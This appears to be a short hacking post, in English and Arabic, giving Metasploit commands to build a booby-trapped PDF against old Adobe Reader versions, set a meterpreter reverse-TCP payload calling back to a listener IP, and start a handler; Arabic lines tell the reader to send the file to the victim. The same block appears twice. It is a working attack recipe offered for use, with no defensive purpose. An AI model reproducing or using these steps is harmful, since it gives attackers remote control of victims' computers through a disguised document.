Hack PC JUST A INNOCENT PDF FILE (ADOBE READER)🌹
Exploit Targets:-
👩💻Adobe Reader 11.0.2
👩💻Adobe Reader 10.1.6
👩💻Adobe Reader 9.5.4
نفتح الميتا و نكتب
use exploit/windows/fileformat/adobe_toolbutton
🌐msf exploit (adobe_toolbutton)>set payload windows/meterpreter/reverse_tcp
🌐msf exploit (adobe_toolbutton)>set lhost 197.108.1.113 (IP of Local Host)
🌐msf exploit (adobe_toolbutton)>exploit
الملف تم تخزينة هنا قم ب تحويله وارساله للضحية
/root/.msf4/local/msf.pdf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.113(تبعك ip)
exploit
#CS
Exploit Targets:-
👩💻Adobe Reader 11.0.2
👩💻Adobe Reader 10.1.6
👩💻Adobe Reader 9.5.4
نفتح الميتا و نكتب
use exploit/windows/fileformat/adobe_toolbutton
🌐msf exploit (adobe_toolbutton)>set payload windows/meterpreter/reverse_tcp
🌐msf exploit (adobe_toolbutton)>set lhost 197.108.1.113 (IP of Local Host)
🌐msf exploit (adobe_toolbutton)>exploit
الملف تم تخزينة هنا قم ب تحويله وارساله للضحية
/root/.msf4/local/msf.pdf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.113(تبعك ip)
exploit
#CS